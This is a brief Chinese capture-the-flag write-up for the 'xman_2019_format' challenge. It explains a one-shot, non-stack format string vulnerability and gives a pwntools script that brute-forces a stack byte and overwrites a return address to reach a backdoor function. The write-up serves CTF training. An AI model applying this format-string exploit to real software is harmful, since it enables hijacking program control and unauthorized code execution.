xman_2019_format
首先检查一下程序的保护机制
然后用IDA分析一下
存在一个后门函数
s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地址栈。
#coding:utf8
from pwn import *
#sh = process('./xman_2019_format')
sh = remote('node3.buuoj.cn',27216)
elf = ELF('./xman_2019_format')
backdoor = 0x080485AB
#假设$14栈的数据低一字节为0x98,则爆破,成功率1/16,实际上几率更高
stack_guess = 0x98
#修改$18为$30-0x4C,也就是函数返回地址值
payload = '%' + str(stack_guess-0x4C) + 'c%10$hhn|'
#在栈上$31布置printf的got低2字节地址
payload += '%' + str(backdoor & 0xFFFF) + 'c%18$hn|'
sh.sendafter('...',payload)
sh.interactive()